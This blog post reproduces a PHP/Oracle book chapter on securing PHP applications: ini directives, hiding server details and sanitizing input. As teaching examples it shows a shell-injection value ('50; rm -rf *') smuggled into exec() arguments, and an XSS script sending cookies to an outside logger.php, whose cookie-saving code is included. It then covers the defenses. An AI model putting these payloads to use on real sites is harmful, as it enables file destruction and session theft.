Tuesday, July 14, 2009

Beginning PHP and Oracle From Novice to Professional by W. Jason Gilmore and Bob Bryla Chapter 21

Any Web site can be thought of as a castle under constant attack by a sea of barbarians. And as the history of both conventional and information warfare shows, often the attackers’ victory isn’t entirely dependent upon their degree of skill or cunning, but rather on an oversight by the defenders. As keepers of the electronic kingdom, you’re faced with no small number of potential ingresses from which havoc can be wrought, perhaps most notably the following:

Software vulnerabilities: Web applications are constructed from numerous technologies, typically a database server, a Web server, and one or more programming languages, all of which could be running on one or more operating systems. Therefore, it’s crucial to constantly keep abreast of exposed vulnerabilities and take the steps necessary to patch the problem before someone takes advantage of it.

User input: Exploiting ways in which user input is processed is perhaps the easiest way to cause serious damage to your data and application, an assertion backed up by the numerous reports of attacks launched on high-profile Web sites in this manner. Manipulation of data passed via Web forms, URL parameters, cookies, and other readily accessible routes enables attackers to strike the very heart of your application logic.

Poorly protected data: Data is the lifeblood of your company; lose it at your own risk. All too often, database and Web accounts are left unlocked or protected by questionable passwords. Or access to Web-based administration applications is available through an easily identifiable URL. These sorts of security gaffes are unacceptable, particularly because they are so easily resolved.

Because each scenario poses significant risk to the integrity of your application, all must be thoroughly investigated and handled accordingly. In this chapter, we review many of the steps you can take to hedge against and even eliminate these dangers.

Configuring PHP Securely

PHP offers a number of configuration parameters that are intended to greatly increase its level of security awareness. This section introduces many of the most relevant options.

Safe Mode

If you’re running a version of PHP earlier than PHP 6 in a shared-server environment, safe mode will be of particular interest. When enabled, safe mode always verifies that the executing script’s owner matches the owner of the file that the script is attempting to open. This prevents the unintended execution, review, and modification of files not owned by the executing user, provided that the file privileges are also properly configured to prevent modification. Enabling safe mode also has other significant effects on PHP’s behavior, in addition to diminishing, or even disabling, the capabilities of numerous standard PHP functions. These effects and the numerous safe mode–related parameters that make up this feature are discussed in this section.

■Caution As of version 6, safe mode is no longer available. See Chapter 2 for more information.

safe_mode = On | Off

Scope: PHP_INI_SYSTEM; Default value: Off
Enabling the safe_mode directive places restrictions on several potentially dangerous language features when using PHP in a shared environment. You can enable safe_mode by setting it to the Boolean value of On, or disable it by setting it to Off. Its restriction scheme is based on comparing the UID (user ID) of the executing script and the UID of the file that the script is attempting to access.
If the UIDs are the same, the script can execute; otherwise, the script fails.
Specifically, when safe mode is enabled, several restrictions come into effect:

• Use of all input/output functions (e.g., fopen(), file(), and require()) is restricted to files that have the same owner as the script that is calling these functions. For example, assuming that safe mode is enabled, if a script owned by Mary calls fopen() and attempts to open a file owned by John, it will fail. However, if Mary owns both the script calling fopen() and the file called by fopen(), the attempt will be successful.
• Attempts by a user to create a new file will be restricted to creating the file in a directory owned by the user.
• Attempts to execute scripts via functions such as popen(), system(), or exec() are only possible when the script resides in the directory specified by the safe_mode_exec_dir configuration directive. This directive is discussed later in this section.
• HTTP authentication is further strengthened because the UID of the owner of the authentication script is prepended to the authentication realm. Furthermore, the PHP_AUTH variables are not set when safe mode is enabled.
• If using the MySQL database server, the username used to connect to a MySQL server must be the same as the username of the owner of the file calling mysql_connect().

The following is a complete list of functions, variables, and configuration directives that are affected when the safe_mode directive is enabled:

• apache_request_headers()
• backticks() and the backtick operator
• chdir()
• chgrp()
• chmod()
• chown()
• copy()
• dbase_open()
• dbmopen()
• dl()
• exec()
• filepro()
• filepro_retrieve()
• filepro_rowcount()
• fopen()
• header()
• highlight_file()
• ifx_*
• ingres_*
• link()
• mail()
• max_execution_time()
• mkdir()
• move_uploaded_file()
• mysql_*
• parse_ini_file()
• passthru()
• pg_lo_import()
• popen()
• posix_mkfifo()
• putenv()
• rename()
• rmdir()
• set_time_limit()
• shell_exec()
• show_source()
• symlink()
• system()
• touch()
• unlink()

safe_mode_gid = On | Off

Scope: PHP_INI_SYSTEM; Default value: Off
This directive changes safe mode’s behavior from verifying UIDs before execution to verifying group IDs. For example, if Mary and John are in the same user group, Mary’s scripts can call fopen() on John’s files.

safe_mode_include_dir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
You can use safe_mode_include_dir to designate various paths in which safe mode will be ignored if it’s enabled. For instance, you might use this directive to specify a directory containing various templates that might be incorporated into several user Web sites. You can specify multiple directories by separating each with a colon on Unix-based systems, and a semicolon on Windows.
Note that specifying a particular path without a trailing slash will cause all directories falling under that path to also be ignored by the safe mode setting. For example, setting this directive to /home/configuration means that /home/configuration/templates/ and /home/configuration/passwords/ are also exempt from safe mode restrictions. Therefore, if you’d like to exclude just a single directory or set of directories from the safe mode settings, be sure to conclude each with the trailing slash.

safe_mode_allowed_env_vars = string

Scope: PHP_INI_SYSTEM; Default value: "PHP_"
When safe mode is enabled, you can use this directive to allow certain environment variables to be modified by the executing user’s script. You can allow multiple variables to be modified by separating each with a comma.

safe_mode_exec_dir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
This directive specifies the directories in which any system programs reside that can be executed by functions such as system(), exec(), or passthru(). Safe mode must be enabled for this to work. One odd aspect of this directive is that the forward slash (/) must be used as the directory separator on all operating systems, Windows included.

safe_mode_protected_env_vars = string

Scope: PHP_INI_SYSTEM; Default value: LD_LIBRARY_PATH
This directive protects certain environment variables from being changed with the putenv() function. By default, the variable LD_LIBRARY_PATH is protected because of the unintended consequences that may arise if this is changed at run time. Consult your search engine or Linux manual for more information about this environment variable. Note that any variables declared in this section will override anything declared by the safe_mode_allowed_env_vars directive.

Other Security-Related Configuration Parameters

This section introduces several other configuration parameters that play an important role in better securing your PHP installation.

disable_functions = string

Scope: PHP_INI_SYSTEM; Default value: NULL
For some, enabling safe mode might seem a tad overbearing. Instead, you might want to just disable a few functions. You can set disable_functions equal to a comma-delimited list of function names that you want to disable. Suppose that you want to disable just the fopen(), popen(), and file() functions. Set this directive like so:

disable_functions = fopen,popen,file

disable_classes = string

Scope: PHP_INI_SYSTEM; Default value: NULL
Given the new functionality offered by PHP’s embrace of the object-oriented paradigm, it likely won’t be too long before you’re using large sets of class libraries. However, there may be certain classes found within these libraries that you’d rather not make available. You can prevent the use
of these classes with the disable_classes directive. For example, suppose you want to completely
disable the use of two classes, named administrator and janitor:

disable_classes = "administrator, janitor"

display_errors = On | Off

Scope: PHP_INI_ALL; Default value: On
When developing applications, it’s useful to be immediately notified of any errors that occur during script execution. PHP will accommodate this need by outputting error information to the browser window. However, this information could possibly be used to reveal potentially damaging details about your server configuration or application. Therefore, when the application moves to a production environment, be sure to disable this directive. You can, of course, continue reviewing these error messages by saving them to a log file or using some other logging mechanism. See Chapter 8 for more information about PHP’s logging features.
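As a minimal sketch of the production setup just described, a script can switch off on-screen errors and send them to a log file instead. The log path is a hypothetical placeholder, and in practice these values would more commonly be set in php.ini than at run time.

```php
<?php
// Hide errors from the browser but keep recording them.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Hypothetical log location (an assumption for this sketch); it should
// sit outside the document root and be writable by the Web server user.
ini_set('error_log', '/var/log/php/app_errors.log');

// Keep reporting everything internally so that errors reach the log.
error_reporting(E_ALL);
```

Setting the values at run time only affects errors raised after these lines execute, which is one reason the php.ini route is usually preferable.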

doc_root = string

Scope: PHP_INI_SYSTEM; Default value: NULL

This directive can be set to a path that specifies the root directory from which PHP files will be served. If the doc_root directive is set to nothing (empty), it is ignored, and the PHP scripts are executed exactly as the URL specifies.

max_execution_time = integer

Scope: PHP_INI_ALL; Default value: 30
This directive specifies how many seconds a script can execute before being terminated. This can be useful to prevent users’ scripts from consuming too much CPU time. If max_execution_time is set to 0, no time limit will be set.

memory_limit = integer

Scope: PHP_INI_ALL; Default value: 8M
This directive specifies how much memory a script can use. The value is interpreted as bytes unless it carries a shorthand suffix such as K, M, or G, so 8M means eight megabytes. In older versions of PHP, this directive is only applicable if --enable-memory-limit is specified when you configure PHP.

open_basedir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
PHP’s open_basedir directive can establish a base directory to which all file operations will be restricted, much like Apache’s DocumentRoot directive. This prevents users from entering otherwise restricted areas of the server. For example, suppose all Web material is located within the directory
/home/www. To prevent users from viewing and potentially manipulating files such as /etc/passwd via a few simple PHP commands, consider setting open_basedir like so:

open_basedir = "/home/www/"

sql.safe_mode = integer

Scope: PHP_INI_SYSTEM; Default value: 0
When enabled, sql.safe_mode ignores all information passed to mysql_connect() and mysql_pconnect(), instead using localhost as the target host. The user under which PHP is running is used as the username (quite likely the Apache daemon user), and no password is used. Note that this directive has nothing to do with the safe mode feature found in versions of PHP earlier than 6.0; their only similarity is the name.

user_dir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
This directive specifies the name of the directory in a user’s home directory where PHP scripts must be placed in order to be executed. For example, if user_dir is set to scripts and user Johnny wants to execute somescript.php, Johnny must create a directory named scripts in his home directory and place somescript.php in it. This script can then be accessed via the URL http://www.example.com/~johnny/scripts/somescript.php. This directive is typically used in conjunction with Apache’s UserDir configuration directive.
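One way to keep an eye on a few of the directives covered in this section is a small audit script. The following is only a sketch: the function name audit_settings() and the choice of which values count as risky are assumptions made for illustration, and the syntax assumes PHP 7 or later.

```php
<?php
/**
 * Return warnings for risky values among a few of the directives
 * discussed in this section. $settings maps directive names to values
 * in the string form that ini_get() returns.
 */
function audit_settings(array $settings): array
{
    $warnings = [];

    // Treat the usual "off" spellings as disabled; anything else is on.
    $display = strtolower((string) ($settings['display_errors'] ?? ''));
    if (!in_array($display, ['', '0', 'off', 'false', 'no'], true)) {
        $warnings[] = 'display_errors is enabled';
    }

    // An empty open_basedir means file operations are unrestricted.
    if ((string) ($settings['open_basedir'] ?? '') === '') {
        $warnings[] = 'open_basedir is not set';
    }

    // A value of 0 removes the execution time limit.
    if ((int) ($settings['max_execution_time'] ?? 0) === 0) {
        $warnings[] = 'max_execution_time is unlimited';
    }

    return $warnings;
}

// Audit the configuration the current script is running under.
$current = [];
foreach (['display_errors', 'open_basedir', 'max_execution_time'] as $name) {
    $current[$name] = ini_get($name);
}
foreach (audit_settings($current) as $warning) {
    echo "Warning: $warning\n";
}
```

Run from the command line, the script will normally report an unlimited execution time, because the command-line version of PHP sets max_execution_time to 0.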

Hiding Configuration Details

Many programmers prefer to wear their decision to deploy open source software as a badge for the world to see. However, it’s important to realize that every piece of information you release about your project may provide an attacker with vital clues that can ultimately be used to penetrate your server. That said, consider an alternative approach of letting your application stand on its own merits while keeping quiet about the technical details whenever possible. Although obfuscation is only a part of the total security picture, it’s nonetheless a strategy that should always be kept in mind.

Hiding Apache

Apache outputs a server signature included within all document requests and within server-generated documents (e.g., a 500 Internal Server Error document). Two configuration directives are responsible for controlling this signature: ServerSignature and ServerTokens.

Apache’s ServerSignature Directive

The ServerSignature directive is responsible for the insertion of that single line of output pertaining to Apache’s server version, server name (set via the ServerName directive), port, and compiled-in modules. When enabled and working in conjunction with the ServerTokens directive (introduced
next), it’s capable of displaying output like this:

Apache/2.0.59 (Unix) DAV/2 PHP/6.0.0-dev Server at www.example.com Port 80

Chances are you would rather keep such information to yourself. Therefore, consider disabling this directive by setting it to Off.

Apache’s ServerTokens Directive
The ServerTokens directive determines which degree of server details is provided if the ServerSignature directive is enabled. Six options are available: Full, Major, Minimal, Minor, OS, and Prod. An example of each is given in Table 21-1.

Table 21-1. Options for the ServerTokens Directive

Option     Example
Full       Apache/2.0.59 (Unix) DAV/2 PHP/6.0.0-dev
Major      Apache/2
Minimal    Apache/2.0.59
Minor      Apache/2.0
OS         Apache/2.0.59 (Unix)
Prod       Apache

Although this directive is moot if ServerSignature is disabled, if for some reason ServerSignature
must be enabled, consider setting the directive to Prod.

Hiding PHP

You can also hide, or at least obscure, the fact that you’re using PHP to drive your site. Use the expose_php directive to prevent PHP version details from being appended to your Web server signature. Block access to phpinfo() to prevent attackers from learning your software version numbers and other key bits of information. Change document extensions to make it less obvious that pages map to PHP scripts.

expose_php = On | Off

Scope: PHP_INI_SYSTEM; Default value: On
When enabled, the PHP directive expose_php appends its details to the server signature. For example, if ServerSignature is enabled and ServerTokens is set to Full, and this directive is enabled, the relevant component of the server signature would look like this:

Apache/2.0.44 (Unix) DAV/2 PHP/5.0.0b3-dev Server at www.example.com Port 80

When expose_php is disabled, the server signature will look like this:

Apache/2.0.44 (Unix) DAV/2 Server at www.example.com Port 80

Remove All Instances of phpinfo() Calls

The phpinfo() function offers a great tool for viewing a summary of PHP’s configuration on a given server. However, left unprotected on the server, the information it provides is a gold mine for attackers. For example, this function provides information pertinent to the operating system, the PHP and Web server versions, and the configuration flags, and a detailed report regarding all available extensions and their versions. Leaving this information accessible to an attacker will greatly increase the likelihood that a potential attack vector will be revealed and subsequently exploited.
Unfortunately, it appears that many developers are either unaware of or unconcerned with such disclosure because typing phpinfo.php into a search engine yields roughly 336,000 results, many of which point directly to a file executing the phpinfo() command, and therefore offering a bevy of information about the server. A quick refinement of the search criteria to include other key terms results in a subset of the initial results (old, vulnerable PHP versions) that would serve as prime candidates for attack because they use known insecure versions of PHP, Apache, IIS, and various supported extensions.
Allowing others to view the results from phpinfo() is essentially equivalent to providing the general public with a road map to many of your server’s technical characteristics and shortcomings. Don’t fall victim to an attack simply because you’re too lazy to remove or protect this file.
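If a phpinfo() page must stay on the server, one way to protect it is to refuse every request that doesn’t come from a trusted address. The sketch below assumes PHP 7 or later; the function name may_view_diagnostics() and the two local addresses are hypothetical choices, not part of PHP.

```php
<?php
/**
 * Decide whether a client may view diagnostic output.
 * $allowed is a list of exact IP addresses.
 */
function may_view_diagnostics(string $clientIp, array $allowed): bool
{
    return in_array($clientIp, $allowed, true);
}

// Assumption for this sketch: only local administration is permitted.
$allowed  = ['127.0.0.1', '::1'];
$clientIp = $_SERVER['REMOTE_ADDR'] ?? '';

if (may_view_diagnostics($clientIp, $allowed)) {
    phpinfo();
} else {
    // Reveal nothing about why the request was refused.
    if (!headers_sent()) {
        header('HTTP/1.1 404 Not Found');
    }
    echo 'Not Found';
}
```

Keep in mind that REMOTE_ADDR holds the address of a proxy or load balancer when one sits in front of the Web server, so this check may need adjusting in such a setup.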

Change the Document Extension

PHP-enabled documents are often easily recognized by their unique extensions, of which the most common include .php, .php3, and .phtml. Did you know that this can easily be changed to any other extension you wish, even .html, .asp, or .jsp? Just change the line in your httpd.conf file that reads

AddType application/x-httpd-php .php

by adding whatever extension you please, for example

AddType application/x-httpd-php .asp

Of course, you’ll need to be sure that this does not cause a conflict with other installed server technologies.

Hiding Sensitive Data

Any document located in a Web server’s document tree and possessing adequate privilege is fair game for retrieval by any mechanism capable of executing the GET command, even if it isn’t linked from another Web page or doesn’t end with an extension recognized by the Web server. Not convinced? As an exercise, create a file and inside this file type my secret stuff. Save this file into your public HTML directory under the name of secrets with some really strange extension such as .zkgjg. Obviously, the server isn’t going to recognize this extension, but it’s going to attempt to serve up the data anyway. Now go to your browser and request that file, using the URL pointing to that file. Scary, isn’t it?
Of course, the user would need to know the name of the file he’s interested in retrieving. However, just like the presumption that a file containing the phpinfo() function will be named phpinfo.php, a bit of cunning and the ability to exploit deficiencies in the Web server configuration are all one really needs to have to find otherwise restricted files. Fortunately, there are two simple ways to definitively correct this problem, both of which are described in this section.

Hiding the Document Root

Inside Apache’s httpd.conf file, you’ll find a configuration directive named DocumentRoot. This is set to the path that you would like the server to consider to be the public HTML directory. If no other safeguards have been undertaken, any file found in this path and assigned adequate permissions is capable of being served, even if the file does not have a recognized extension. However, it is not possible for a user to view a file that resides outside of this path. Therefore, consider placing your configuration files outside of the DocumentRoot path.
To retrieve these files, you can use include() to include those files into any PHP files. For example, assume that you set DocumentRoot like so:
# Windows
DocumentRoot C:/apache2/htdocs
# Unix
DocumentRoot /www/apache/home

Suppose you’re using a logging package that writes site access information to a series of text files. You certainly wouldn’t want anyone to view those files, so it would be a good idea to place them outside of the document root. Therefore, you could save them to some directory residing outside of the previous paths:

C:/Apache/sitelogs/ # Windows
/usr/local/sitelogs/ # Unix
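The include() approach mentioned earlier can be sketched as follows, assuming PHP 7 or later. The helper private_path() and the file name settings.inc.php are hypothetical; the point is only that PHP can read a file the Web server will never serve.

```php
<?php
/**
 * Build a path that is a sibling of the document root, so the Web
 * server cannot serve it directly.
 */
function private_path(string $documentRoot, string $relative): string
{
    // dirname() drops the last path component:
    // /www/apache/home becomes /www/apache
    return dirname(rtrim($documentRoot, '/')) . '/' . ltrim($relative, '/');
}

// Hypothetical file name; browsers cannot request it, but PHP can read it.
$settingsFile = private_path('/www/apache/home', 'siteconfig/settings.inc.php');

if (is_readable($settingsFile)) {
    require_once $settingsFile;
}
```

In a live script, $_SERVER['DOCUMENT_ROOT'] could be passed in place of the hard-coded path.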

Denying Access to Certain File Extensions

A second way to prevent users from viewing certain files is to deny access to certain extensions by configuring the httpd.conf file Files directive. Assume that you don’t want anyone to access files having the extension .inc. Place the following in your httpd.conf file:
<Files *.inc>
Order allow,deny
Deny from all
</Files>

After making this addition, restart the Apache server and you will find that access is denied to any user making a request to view a file with the extension .inc via the browser. However, you can still include these files in your scripts. Incidentally, if you search through the httpd.conf file, you will see that this is the same premise used to protect access to .htaccess.

Sanitizing User Data

Neglecting to review and sanitize user-provided data at every opportunity could provide attackers the opportunity to do massive internal damage to your application, data, and server, and even steal the identity of unsuspecting site users. This section shows you just how significant this danger is by demonstrating two attacks left open to Web sites whose developers have chosen to ignore this necessary safeguard. The first attack results in the deletion of valuable site files, and the second attack results in the hijacking of a random user’s identity through an attack technique known as cross-site scripting. This section concludes with an introduction to a few easy data validation solutions that will help remedy this important matter.

File Deletion

To illustrate just how ugly things could get if you neglect validation of user input, suppose that your application requires that user input be passed to some sort of legacy command-line application called inventorymgr that hasn’t yet been ported to PHP. Executing such an application by way of PHP requires use of a command execution function such as exec() or system(). The inventorymgr application accepts as input the SKU of a particular product and a recommendation for the number of products that should be reordered. For example, suppose the cherry cheesecake has been particularly popular lately, resulting in a rapid depletion of cherries. The pastry chef might use the application to order 50 more jars of cherries (SKU 50XCH67YU), resulting in the following call to inventorymgr:

$sku = "50XCH67YU";
$inventory = "50";
exec("/opt/inventorymgr ".$sku." ".$inventory);

Now suppose the pastry chef has become deranged from sniffing an overabundance of oven fumes and decides to attempt to destroy the Web site by passing the following string in as the recommended quantity to reorder:

50; rm -rf *

This results in the following command being executed in exec():

exec("/opt/inventorymgr 50XCH67YU 50; rm -rf *");

The inventorymgr application would indeed execute as intended but would be immediately followed by an attempt to recursively delete every file residing in the directory where the executing PHP script resides.

Cross-Site Scripting

The previous scenario demonstrates just how easily valuable site files could be deleted should user data not be filtered. While it’s possible that damage from such an attack could be minimized by restoring a recent backup of the site and corresponding data, it would be considerably more difficult to recover from the damage resulting from the attack demonstrated in this section because it involves the betrayal of a site user that has otherwise placed his trust in the security of your Web site. Known as cross-site scripting, this attack involves the insertion of malicious code into a page frequented by other users (e.g., an online bulletin board). Merely visiting this page can result in the transmission of data to a third party’s site, which could allow the attacker to later return and impersonate the unwitting visitor. Let’s set up the environment parameters that welcome such an attack.
Suppose that an online clothing retailer offers registered customers the opportunity to discuss the latest fashion trends in an electronic forum. In the company’s haste to bring the custom-built forum online, it decided to forgo sanitization of user input, figuring it could take care of such matters at a later point in time. One unscrupulous customer decides to attempt to retrieve the session keys (stored in cookies) of other customers, which could subsequently be used to enter their accounts. Believe it or not, this is done with just a bit of HTML and JavaScript that can forward all forum visitors’ cookie data to a script residing on a third-party server. To see just how easy it is to retrieve cookie data, navigate to a popular Web site such as Yahoo! or Google and enter the following into the browser address bar:

javascript:void(alert(document.cookie))

You should see all of your cookie information for that site posted to a JavaScript alert window similar to that shown in Figure 21-1.

Figure 21-1. Displaying cookie information from a visit to http://www.news.com

Using JavaScript, the attacker can take advantage of unchecked input by embedding a similar command into a Web page and quietly redirecting the information to some script capable of storing it in a text file or a database. The attacker does exactly this, using the forum’s comment-posting tool to add the following string to the forum page:
<script>
document.location = 'http://www.example.org/logger.php?cookie=' +
document.cookie
</script>

The logger.php file might look like this:

<?php
// Assign GET variable
$cookie = $_GET['cookie'];

// Format variable in easily accessible manner
$info = "$cookie\n\n";

// Write information to file
$fh = @fopen("/home/cookies.txt", "a");
@fwrite($fh, $info);

// Return to original site
header("Location: http://www.example.com");
?>

Provided the e-commerce site isn’t comparing cookie information to a specific IP address, a safeguard that is all too uncommon, all the attacker has to do is assemble the cookie data into a format supported by her browser, and then return to the site from which the information was culled. Chances are she’s now masquerading as the innocent user, potentially making unauthorized purchases with the victim’s credit card, further defacing the forums, and even wreaking other havoc.

Sanitizing User Input: The Solution

Given the frightening effects that unchecked user input can have on a Web site and its users, one would think that carrying out the necessary safeguards must be a particularly complex task. After all, the problem is so prevalent within Web applications of all types, prevention must be quite difficult, right? Ironically, preventing these types of attacks is really a trivial affair, accomplished by first passing the input through one of several functions before performing any subsequent task with it. Four standard functions are conveniently available for doing so: escapeshellarg(), escapeshellcmd(), htmlentities(),
and strip_tags().

■Note Keep in mind that the safeguards described in this section, and frankly throughout the chapter, while
effective, offer only a few of the many possible solutions at your disposal. For instance, in addition to the four functions described in this section, you could also typecast incoming data to make sure it meets the requisite types as expected by the application. Therefore, although you should pay close attention to what’s discussed in this chapter, you should also be sure to read as many other security-minded resources as possible to obtain a comprehensive understanding of the topic.
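The typecasting idea mentioned in the preceding note might look like the following sketch, which assumes PHP 7.1 or later and the ctype extension. The function name parse_quantity() and the upper limit of 10,000 are arbitrary assumptions chosen for illustration.

```php
<?php
/**
 * Return the reorder quantity as an integer, or null when the input
 * is not a plain run of digits within the accepted range.
 */
function parse_quantity(string $raw, int $max = 10000): ?int
{
    // ctype_digit() is true only when every character is 0-9;
    // the length check keeps the cast well inside integer range.
    if (!ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }

    $value = (int) $raw;

    return ($value >= 1 && $value <= $max) ? $value : null;
}

var_dump(parse_quantity('50'));            // int(50)
var_dump(parse_quantity('50; rm -rf *'));  // NULL
```

Rejecting anything that isn’t purely numeric means a malicious quantity never reaches the shell in the first place.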

Escaping Shell Arguments

The escapeshellarg() function delimits its arguments with single quotes and escapes quotes. Its prototype follows:

string escapeshellarg(string arguments)

The effect is such that when arguments is passed to a shell command, it will be considered a single argument. This is significant because it lessens the possibility that an attacker could masquerade additional commands as shell command arguments. Therefore, in the previously described file-deletion scenario, all of the user input would be enclosed in single quotes, like so:

/opt/inventorymgr '50XCH67YU' '50; rm -rf *'

Attempting to execute this would mean 50; rm -rf * would be treated by inventorymgr as the requested inventory count. Presuming inventorymgr is validating this value to ensure that it’s an integer, the call will fail and no real harm will be done.
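Applied to the earlier exec() call, the quoting could be sketched like this, assuming PHP 7 or later. The function name build_inventory_command() is a hypothetical helper, and the output shown assumes a Unix-like system; on Windows, escapeshellarg() quotes differently.

```php
<?php
/**
 * Build the inventorymgr command line with each user-supplied value
 * quoted as a single shell argument.
 */
function build_inventory_command(string $sku, string $inventory): string
{
    return '/opt/inventorymgr '
        . escapeshellarg($sku) . ' '
        . escapeshellarg($inventory);
}

$command = build_inventory_command('50XCH67YU', '50; rm -rf *');

// On a Unix-like system this prints:
// /opt/inventorymgr '50XCH67YU' '50; rm -rf *'
echo $command, "\n";

// The command would then be run with exec($command).
```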

Escaping Shell Metacharacters

The escapeshellcmd() function operates under the same premise as escapeshellarg(), but it sanitizes potentially dangerous input program names rather than program arguments. Its prototype follows:

string escapeshellcmd(string command)

This function operates by escaping any shell metacharacters found in the command. These metacharacters include # & ; ` | * ? ~ < > ^ ( ) [ ] { } $ and \.
You should use escapeshellcmd() in any case where the user’s input might determine the name of a command to execute. For instance, suppose the inventory-management application is modified to allow the user to call one of two available programs, foodinventorymgr or supplyinventorymgr, by passing along the string food or supply, respectively, together with the SKU and requested amount. The exec() command might look like this:

exec("/opt/".$command."inventorymgr ".$sku." ".$inventory);

Assuming the user plays by the rules, the task will work just fine. However, consider what would happen if the user were to pass along the following as the value to $command:

blah; rm -rf *;

This results in the following command being passed to the shell:

/opt/blah; rm -rf *; inventorymgr 50XCH67YU 50

This assumes the user also passes in 50XCH67YU and 50 as the SKU and inventory number, respectively. These values don’t matter anyway because the appropriate inventorymgr command will never be invoked since a bogus command was passed in to execute the nefarious rm command. However, if this material were to be filtered through escapeshellcmd() first, $command would look like this:

blah\; rm -rf \*\;

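This means the semicolons and the asterisk lose their special meaning to the shell. Rather than running rm as a separate command, exec() would attempt to execute a program literally named /opt/blah; with rm, -rf, and the remaining text passed along as ordinary arguments. That program of course doesn’t exist, so nothing is deleted.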
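Because only two program names are valid in this scenario, an allow-list is worth considering as well. Note that this is a different technique from escapeshellcmd(), shown here only as a complementary sketch; it assumes PHP 7.1 or later, and the function name resolve_inventory_program() is hypothetical.

```php
<?php
/**
 * Map the user's choice to a fixed program path, or return null when
 * the choice is not one of the two known programs.
 */
function resolve_inventory_program(string $choice): ?string
{
    $programs = [
        'food'   => '/opt/foodinventorymgr',
        'supply' => '/opt/supplyinventorymgr',
    ];

    return $programs[$choice] ?? null;
}

$program = resolve_inventory_program('blah; rm -rf *;');

if ($program === null) {
    // The user's text never reaches the shell.
    echo "Unknown inventory program\n";
} else {
    echo "Would run: $program\n";
}
```

With this approach the user’s input only selects among paths the developer wrote, so the SKU and quantity are the only values that still need escaping.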

Converting Input into HTML Entities

The htmlentities() function converts certain characters that have special meaning in an HTML context to strings that a browser can render as provided rather than execute them as HTML. Its prototype follows:

string htmlentities(string input [, int quote_style [, string charset]])

Five characters in particular are considered special by this function:

• & will be translated to &amp;

• " will be translated to &quot; (unless quote_style is set to ENT_NOQUOTES)

• > will be translated to &gt;

• < will be translated to &lt;

• ' will be translated to &#039; (when quote_style is set to ENT_QUOTES)

Returning to the cross-site scripting example, if the user’s input is passed through htmlentities() before being embedded into the page, it is displayed exactly as it was typed rather than executed as JavaScript, because it is translated like so:

&lt;script&gt;
document.location = 'http://www.example.org/logger.php?cookie=' +
document.cookie
&lt;/script&gt;
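A forum might wrap the call in a small helper so that every comment is encoded the same way before display. This is a sketch assuming PHP 7 or later; the function name escape_for_html() is hypothetical, and UTF-8 is an assumption about the page’s character set.

```php
<?php
/**
 * Encode a user-supplied string for safe display inside HTML.
 * ENT_QUOTES converts both double and single quotes.
 */
function escape_for_html(string $input): string
{
    return htmlentities($input, ENT_QUOTES, 'UTF-8');
}

$comment = "<script>document.location = 'http://www.example.org/'</script>";

// Prints the markup as harmless text:
// &lt;script&gt;document.location = &#039;http://www.example.org/&#039;&lt;/script&gt;
echo escape_for_html($comment), "\n";
```

Encoding at the moment of output, rather than when the comment is stored, keeps the original text intact for other uses.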

Stripping Tags from User Input

Sometimes it is best to completely strip user input of all HTML input, regardless of intent. For instance, HTML-based input can be particularly problematic when the information is displayed back to the browser, as is the case of a message board. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all. This problem can be eliminated by passing the user input through strip_tags(), which removes all HTML tags from a string. Its prototype follows:

string strip_tags(string str [, string allowed_tags])

The input parameter str is the string that will be examined for tags, while the optional input parameter allowed_tags specifies any tags that you would like to be allowed in the string. For example, italic tags (<i></i>) might be allowable, but table tags such as <td></td> could potentially wreak havoc on a page. An example follows:

<?php
$input = "I <td>really</td> love <i>PHP</i>!";
$input = strip_tags($input, "<i>");
// $input now equals "I really love <i>PHP</i>!"
?>
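
One caveat is worth illustrating with a short sketch: strip_tags() removes disallowed tags, but it leaves the attributes of allowed tags untouched. The input string below is a made-up example rather than one from the chapter:

```php
<?php
// Made-up input: an allowed <i> tag carrying an event-handler attribute.
$input = '<i onmouseover="alert(1)">PHP</i> is <td>great</td>';

// Only <i> is allowed, so <td> is removed, but the attribute on <i> is kept as-is.
$clean = strip_tags($input, '<i>');

// Prints: <i onmouseover="alert(1)">PHP</i> is great
echo $clean, "\n";
```

For this reason, allowing even harmless-looking tags may still call for further filtering of the result.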

Taking Advantage of PEAR: Validate

While the functions described in the preceding section work well for stripping potentially malicious data from user input, what if you want to verify whether the provided data is a syntactically valid e-mail address, or whether a number falls within a specific range? Because these are such commonplace tasks, a PEAR package called Validate can perform these verifications and more. You can also install additional rules for validating the syntax of localized data, such as an Australian phone number.

Installing Validate

To take advantage of Validate’s features, you need to install it from PEAR. Therefore, start PEAR and pass along the following arguments:

%>pear install -a Validate-0.6.5

Starting to download Validate-0.6.5.tgz (16,296 bytes)
......done: 16,296 bytes
downloading Date-1.4.6.tgz ...
Starting to download Date-1.4.6.tgz (53,535 bytes)
...done: 53,535 bytes
install ok: channel://pear.php.net/Date-1.4.6
install ok: channel://pear.php.net/Validate-0.6.5

The -a option causes the optional package dependency, Date, to be installed as well. If you don’t plan on validating dates, you can omit this option. Also, in this example the version number is appended to the package name; this is because at the time this was written, Validate was still in a beta state. Once it reaches a stable version there will be no need to include the version number.

Validating a String

Some data should consist only of numeric characters, alphabetical characters, a certain range of characters, or maybe even all uppercase or lowercase letters. You can validate such rules and more using Validate’s string() method:

<?php
// Include the Validate package
require_once "Validate.php";

// Retrieve the provided username
$username = $_POST['username'];

// Instantiate the Validate class
$validate = new Validate();

// Determine if the username is valid
if ($validate->string($username, array("format" => VALIDATE_ALPHA,
    "min_length" => "3", "max_length" => "15")))
    echo "Valid username!";
else
    echo "The username must consist of 3 to 15 alphabetical characters!";
?>

Validating an E-mail Address

Validating an e-mail address’s syntax is a fairly difficult matter, requiring the use of a somewhat complex regular expression. The problem is compounded by most users’ lack of understanding regarding what constitutes a valid address. For example, which of the following three e-mail addresses are invalid?

john++ilove-pizza@example.com
john&sally4ever@example.com
i.brake4_pizza@example.co.uk

You might be surprised to learn they’re all valid! If you don’t know this and attempt to implement an e-mail validation function, it’s possible you could prevent a perfectly valid e-mail address from being processed. Why not leave it to the Validate package? Consider this example:

<?php
// Include the Validate package
require_once "Validate.php";

// Retrieve the provided e-mail address
$email = $_POST['email'];

// Instantiate the Validate class
$validate = new Validate();

// Determine if address is valid
if ($validate->email($email))
    echo "Valid e-mail address!";
else
    echo "Invalid e-mail address!";
?>

